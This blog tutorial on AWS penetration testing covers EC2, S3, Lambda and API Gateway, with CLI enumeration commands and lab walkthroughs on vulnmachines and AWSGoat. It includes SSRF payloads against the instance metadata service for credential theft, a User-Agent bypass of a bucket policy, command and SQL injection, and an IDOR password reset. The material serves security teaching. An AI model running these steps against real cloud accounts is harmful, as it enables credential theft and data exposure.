Cloud environments have evolved in recent years with more and more companies migrating to cloud infrastructure hosted by providers like Amazon Web Services (AWS). As companies migrate their infrastructure to the cloud, they face new challenges, especially within the framework of the Shared Responsibility Model. This model, while empowering, introduces fresh vulnerabilities that can significantly impact a company’s security landscape.
In this post, we will cover existing testing methodologies and the specific steps required to conduct an AWS penetration test. Additionally, I’ve summed up an introduction to Amazon Web Services, attack vectors of the AWS platform, and the dangers of cloud environments, which are highly recommended reads if you are new to cloud pen-testing or AWS.
1) Existing AWS testing methodologies
Testing and auditing AWS services for penetration testing purposes requires deep technical knowledge about all available configurations and possible security implications. I will also explain the two common methodologies and sources of security configurations in AWS.
Amazon Web Services itself is probably the best starting point to learn about the general security of AWS and its services via their Best Practices for Security, Identity, and compliance. Each service has its documentation which can be selected via the AWS Documentation page. This documentation is also useful in a penetration test, especially if a lesser-known AWS service is used.
2) AWS
Amazon Web Services itself is probably the best starting point to learn about the general security of AWS and its services via their Best Practices for Security, Identity, and Compliance. Each service has its documentation which can be selected via the AWS Documentation page. This documentation is also useful in a penetration test, especially if a lesser-known AWS service is used.
The Shared Responsibility Model
AWS uses a Shared Responsibility Model, divided into Security of the Cloud (AWS’s responsibility) and Security in the Cloud (customer’s responsibility). With the Security of the Cloud, AWS ensures the availability, management, and security of AWS services. This includes maintaining updates and security patches on which the services reside as well as the virtualization layers and physical security of the facilities and redundant services.
The customer’s Security in the Cloud, customers are responsible for securing their chosen services. For Infrastructure as a Service (IaaS), like an EC2 instance, customers need to configure and secure it extensively, including tasks such as installing updates, patches, and setting up network firewalls. On the other hand, more abstract services like Amazon S3 buckets require less customer configuration since AWS manages the infrastructure and operating system.
The most important thing is the configuration steps that the customer must take to manage the data used in the services and apply appropriate access permissions.
3) CIS Benchmarks
The Center of Internet Security (CIS) gives us free access to the Amazon Web Services Benchmark documents via their website(link). Available documents directly related to Amazon Web Services include:
- CIS AWS Foundations Benchmark v1.5.0
- CIS AWS End User Compute Services Benchmark v1.0.0
- CIS AWS Three-tier Web Architecture Benchmark v1.0.0
These documents focus on the general security configuration of an AWS platform. We can do security audits using these documents.
4) Cloud Assessment and Cloud Penetration Testing
Purpose:
- Cloud Audit: The primary purpose of a cloud audit is to assess and ensure compliance with predefined standards, regulations, and security policies. It focuses on evaluating the adherence of cloud infrastructure to industry-specific requirements and internal policies.
- Cloud Penetration Testing: Penetration testing aims to identify and exploit vulnerabilities in a system. In the context of the cloud, it involves actively simulating cyberattacks to assess the security of the infrastructure, applications, and data. The goal is to find and address weaknesses before malicious actors can exploit them.
Outcome:
- Cloud Audit: The outcome of a cloud audit is an assessment of the cloud environment’s compliance status. It provides a report on whether the organization meets the required standards and regulations.
- Cloud Penetration Testing: The outcome of penetration testing is a detailed analysis of vulnerabilities discovered, potential exploits, and recommendations for improving security. It helps organizations understand their risk posture and enhance their security posture.
5) Importance of Penetration Testing on AWS Environments
Cloud providers make it easier for companies to dynamically create new services, request resources per need, and outsource IT tasks. However, cloud environments are still evolving, which may introduce new vulnerabilities to the infrastructure, and especially with the Shared Responsibility Model, may introduce new risks to a company’s threat model during the migration of content to the cloud.
Now, let’s shift our focus to a more detailed examination of AWS penetration testing, building upon the general information provided earlier.
6) Identify the Attack Surface
In a cloud penetration test, the initial step involves identifying, beyond the scoping process, the following aspects:
- Services utilized by the application (e.g., EC2 vs Lambda)
- Externally exposed services (e.g., S3 bucket with static CSS files and DynamoDB)
- Determining whether services are managed by AWS or the customer.
This process also entails enumerating and fingerprinting the cloud infrastructure to identify used components and any third-party software in place.
Which Techniques Are Commonly Used in AWS Penetration Testing Along an Attack Path?
In this section, we assume that we are already performing a cloud penetration test against a vulnerable application that uses various AWS services. I will mention penetration testing for most of the services that are used in AWS. Before giving information about penetration testing in each section, I will briefly explain the services in the relevant section. I will also provide information about commands used in penetration tests within each section. Let’s start.
6.1) Pentesting AWS Elastic Compute Cloud (EC2)
Amazon Elastic Compute Cloud (Amazon EC2) is a core web service offered by Amazon Web Services (AWS). EC2 provides resizable compute capacity in the cloud, allowing users to run virtual servers, known as instances. These instances can be quickly scaled up or down based on demand. Amazon Machine Images (AMI) are images used to create virtual machines. It’s possible to create a malicious image to compromise users, so EC2 service is a good attack surface for AWS penetration testing.
a. Common Attack Vectors Targeting EC2:
- Weak Authentication: Using weak or default credentials for accessing EC2 instances can make them vulnerable to unauthorized access. It is essential to use strong, unique passwords or SSH keys.
- Open Ports and Services: Unused or unnecessary ports and services running on EC2 instances can be potential entry points for attackers. It’s essential to minimize the attack surface by closing unnecessary ports and services.
- Instance Metadata Exploitation: Attackers may attempt to exploit AWS instance metadata to gain unauthorized access or gather information about the EC2 instance. It’s crucial to restrict access to metadata and use appropriate IAM roles.
- Insecure AMIs (Amazon Machine Images): Using outdated or community AMIs that have not been properly vetted can introduce security vulnerabilities. It’s recommended to use official and regularly updated AMIs.
- Privilege Escalation: Insecure configurations or mismanagement of AWS Identity and Access Management (IAM) roles may lead to privilege escalation, allowing unauthorized users to gain elevated permissions.
b. Enumeration:
Enumerate information about the EC2 instances. EC2 instance connect is an IAM right that we can add to a user, enabling us to temporarily connect to an instance. Enumerate including public IP addresses, private IP addresses, DNS names, security groups, IAM roles, and metadata.
- Identify all EC2 instances’ public IP addresses and associated DNS names.
- Enumerate private IP addresses for internal communication and interaction with VPC.
- Identify security groups associated with each EC2 instance.
- Gather details about the VPC, subnets, and routing.
- List IAM users and roles associated with EC2 instances.
- OS version and patch level of each EC2 instance. Identify any known vulnerabilities associated with specific OS versions.
- Enumerate installed software and services on EC2 instances. Assess the versioning to identify any outdated or vulnerable software.
- Listing information about all instances (aws ec2 describe-instances)
- Listing information about a specific region (aws ec2 describe-instances –region region)
- Listing information about specific instance (aws ec2 describe-instances –instance-ids ID)
- Extracting UserData attribute of specified instance (aws ec2 describe-instance-attribute –attribute userData –instance-id instanceID (This command gathers the metadata from the instance, like commands or secrets. The output is base64 encoded.)
- Listing roles of an instance (aws ec2 describe-iam-instance-profile-associations)
c. Vulnerability Scanning:
AWS Inspector – Utilize AWS Inspector for agent-based vulnerability scanning on EC2 instances. Ensure that the AWS Inspector agent is properly installed and configured on target instances.
Third-Party Scanning Tools – Depending on the company preferences and tool availability we can use Nessus, Burp-Suite, or Qualys… as well as these tools, custom scripts can also be used.
Vulnerabilities found in the scan results should be evaluated as a false-positive or false-negative.
d. Exploitation: Initial access can happen by RCE or SSRF. Metadata can be used to exfiltrate information from the instance.
Remote Code Execution – If we have remote code execution or SSRF, we can grab metadata information.
- curl http://<ip adress>/latest/meta-data
For grabbing the keys to access the instance
- curl http://<ip adress>/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance
Now, I will demonstrate how to exploit an SSRF vulnerability on the vulnerable EC2 instance in the test environment.
Step 1: Login to https://www.vulnmachines.com/
Step 2: Navigate to “Challenges >> Cloud Labs >> Vulnerable Instance”.
Step 3: Click on “Lab Access” to navigate to tab.
Step 4: Here, I want to try SSRF vulnerability because it is the most common attack vector in AWS EC2 penetration testing. I tried and I found an SSRF vulnerability in the web application. Then I confirmed the SSRF vulnerability by adding a Burp collaborator link.
Step 5: Now I entered “http://169.254.169.254/” URL to read EC2 metadata as shown in the screenshot below. The IP address 169.254.169.254 is a magic IP in the cloud world. Check “https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html” URL to get more metadata information.
Step 6: Enter http://169.254.169.254/latest/ URL to read metadata.
Step 7: Enter “http://169.254.169.254/latest/user-data” to check the “user-data” directory.
As I can observe, the user cloudlab moved the “f149.txt” file to the root directory.
Step 8: Now enter “file:///f149.txt” payload to read the file.
6.2) Pentesting AWS Simple Storage Service Buckets (S3 Buckets)
Amazon S3 or Amazon Simple Storage Service is a service offered by Amazon Web Services that provides object storage through a web service interface. It contains lots of buckets. Think of a bucket as a top-level folder or directory where we can store and organize our data. Each bucket has a globally unique name within the AWS S3 namespace, and objects within a bucket are addressed using unique keys, so Simple Storage Service (S3) buckets are one of the most popular attack surfaces for AWS infrastructures, and they’re the most prone to hacking attacks.
a. Common Attack Vectors Targeting S3:
- Unsecured Buckets: Misconfigured bucket permissions can lead to unauthorized access. If a bucket is set to public access or has overly permissive access controls, it may expose sensitive data.
- Insecure Direct Object References (IDOR): If S3 bucket URLs or object references are predictable, attackers might be able to access or manipulate objects directly.
- Data Exposure: Leakage of sensitive data due to misconfigured or publicly accessible buckets can result in data exposure. This includes unintentional exposure of personally identifiable information (PII) or sensitive data.
- Bucket Enumeration: Attackers may try to identify valid bucket names through brute force or other means, potentially leading to unauthorized access.
b. Enumeration:
- Listing all buckets in aws account
- aws s3 api list-buckets
- Getting information about a specific bucket
- aws s3 api get-bucket-acl –bucket name
- Getting information about a specific bucket policy
- aws s3 api get-bucket-policy –bucket name
- Getting the Public Access Block configuration for an S3 bucket
- aws s3 api get-public-access-block –bucket name
- Listing all objects in a specific bucket
- aws s3 api list-objects –bucket name
- Getting ACL information about specific object
- aws s3api get-object-acl –bucket-name name –key object_name
Data Exfiltration
- It’s possible to brute-force files in the bucket.
- If the bucket is misconfigured, we can read data through web browser, cli/api or time-based URL.
Public Access: Just enter the URL in the browser
https://bucket-name.region.amazonaws.com/test.txt
Authenticated User:
aws s3api get-object –bucket name –key object-name download-file-location
Time-Based URL: Generate a time-based URL for an object, useful if the object is not public.
aws s3 presign s3://bucket-name/object-name –expires-in 605000
Now I will show you step by step a simple CTF solution regarding S3 from the vulnmachines.
Step 1: Login to https://www.vulnmachines.com/
Step 2: Navigate to “Challenges >> Cloud Labs >> Misconfigured Bucket”.
Step 3: Click on “Lab Access” to navigate to tab.
Step 4: Now let’s try to list all objects by modifying the URL as shown in the screenshot below.
Here, bucket “vnm-sec-aws” is not public so it will not allow users to list all objects.
Step 5: Now, I will use AWS CLI to list all the objects of the “vnm-sec-aws” bucket. Use “https://docs.aws.amazon.com/cli/latest/userguide/getting-started-install.html” to setup AWS CLI and use “aws configure” to add credentials as shown in below screenshot.
Step 6: As “vnm-sec-aws” bucket allows any authenticated user to read all objects from S3 bucket, I can use “aws s3 ls s3://vnm-sec-aws/ — recursive” command to list all objects as shown in below screenshot.
Step 7: I can copy flag.txt file using the command “aws s3 cp s3://vnm-sec-aws/a/b/c/d/e/f/g/h/i/j/k/l/m/n/o/p/flag.txt .”
Step 8: Finally, read your flag with cat command in Linux system.
Let’s continue with another S3 pentest scenario. We have lab access as seen screenshot in below.
Step 1: I must perform a recon on the lab URL to identify the hidden file. I used the dirb tool and found the “secret.html” file.
Step 2 : I accessed the “http://54.84.44.100/secret.html” URL.
Here I can observe that multiple times “f149.txt” URL is given with a note that I can access f149.txt if my “User-Agent” header value is “VnMSecurityLab”.
Step 3: I individually accessed each URL and intercepted the traffic using Burp Suite. The URLs returned 403 forbidden responses.
Subsequently, I modified the value of the ‘User-Agent’ header. That’s done; the bucket policy has been bypassed.
6.3) Penetration testing AWS Lambda & API Gateway
AWS Lambda is a powerful serverless service that enables us to create functions and applications without managing server infrastructure. We can develop a Lambda function containing our code and set up a trigger, and the function executes when the trigger is activated. Lambda supports various programming languages, and we can even set up custom runtimes. API Gateway is an AWS service for creating, publishing, maintaining, monitoring, and securing REST, HTTP, and WebSocket API. API Gateway can used to trigger lambda functions in a synchronous (API gateway), asynchronous (event), or stream (Poll Based) way.
a.) Common Attack Vectors Targeting Lambda & API Gateway:
- Injection Attacks: Malicious input data can lead to code injection vulnerabilities, especially if proper input validation is not implemented.
- Cross-Site Scripting (XSS): If user input is not properly sanitized, it may lead to XSS attacks, especially in scenarios involving API Gateway and frontend applications.
- Data Exposure: Inadequate protection of sensitive data during transit or storage within Lambda functions or API Gateway endpoints can lead to data exposure.
- Unauthorized Access: Insufficient authentication and authorization mechanisms can allow unauthorized users to invoke Lambda functions or access API Gateway resources.
b.) Enumeration:
- Listing all lambda functions
- aws lambda list-functions
- Listing information about a specific lambda function
- aws lambda get-function –function-name function_name (This command enables us to download the source code of the lambda function)
- Listing policy information about the function
- aws lambda get-policy –function-name function_name (We can get informations like who can execute this functions, ID and other informations with this command)
- Listing the event source mapping information about a lambda function
- aws lambda list-event-source-mappings –function-name function_name
- Listing Lambda Layers (Dependencies)
- aws lambda list-layers
- Listing full information about a lambda layer
- aws lambda get-layer-version –layer-name name –version-number version_number
If API Gateway is used, we can enumerate APIs to see how it can invoke the lambda function.
- Listing Rest API’s
- aws apigateway get-rest-apis
- Listing information about endpoints
- aws apigateway get-resources –rest-api-id ID
- Listing method information for the endpoint
- aws apigateway get-method –rest-api-id ApiID –resource-id ID –http-method method
- Listing all versions of a rest api
- aws apigateway get-stages –rest-api-id ID
Now, let’s test the web service that uses the vulnerable lambda function in a laboratory environment.
Step 1: Login to https://www.vulnmachines.com/
Step 2: Navigate to “Challenges >> Cloud Labs >> Misconfigured Bucket”.
Step 3: Click on “Lab Access” to navigate to the tab.
Step 4: I perform recon to identify URL parameters. We can use the “Param Miner” Burp extension. First, capture the vuln-lambda request, then send it to the repeater, right-click, extension>Param Miner> Guess params> Guess GET parameters.
I found the “command” parameter with param miner extension.
Step 5: I tried to find the command injection vulnerability as shown in the screenshot below.
Finally, I will demonstrate step by step how to exploit vulnerabilities in services that are in place in AWS. in the laboratory environment called AWS GOAT, which contains multiple vulnerabilities. If you want to install AWSGOAT you can get an information-related link (https://github.com/ine-labs/AWSGoat). Let’s start.
SQL Injection:
I created an account named ‘Test’ during the registration process. After logging in, I explored the platform, visited the user page, noticed a search button, and decided to first test for SQL injection vulnerabilities. I tried basic payloads; I can see the other information from the database. As seen screenshots below.
Insecure Direct Object Reference (IDOR) Vulnerability:
I navigated to the password reset section after accessing user IDs by exploiting a SQL injection vulnerability. I changed my password and captured my request, sent it to a repeater.
I attempted to reset the password of another user with ID number 3 and succeeded.
Sensitive Data Exposure in Misconfigured S3 buckets:
I returned to the home page. There were numerous blog posts available. I then inspected the website source and found the links to the buckets for displaying their contents.
I tried to view the contents of the buckets.
Dev-blog is useful for me. I saw ssh config files and some ssh keys in the output.
I downloaded the SSH config and retrieved the IP addresses and hostnames. I also got the SSH private key paths.
To sum up, misconfigured S3 buckets lead to the exposure of sensitive data, as seen in the scenario.
Conclusion
AWS pentesting is an ongoing process that demands a diverse knowledge base and unwavering dedication. With AWS consistently introducing new services and functionalities, security checks and attack strategies require continual updates. As a pentester, declaring the completion of AWS environment testing can be challenging due to its vast and complex nature. It is crucial to encompass a wide array of services and attacks within the agreed-upon timeline with the client. I trust that the insights gained from this blog post on real-world AWS penetration testing will prove beneficial in your work.
Stay safe 😊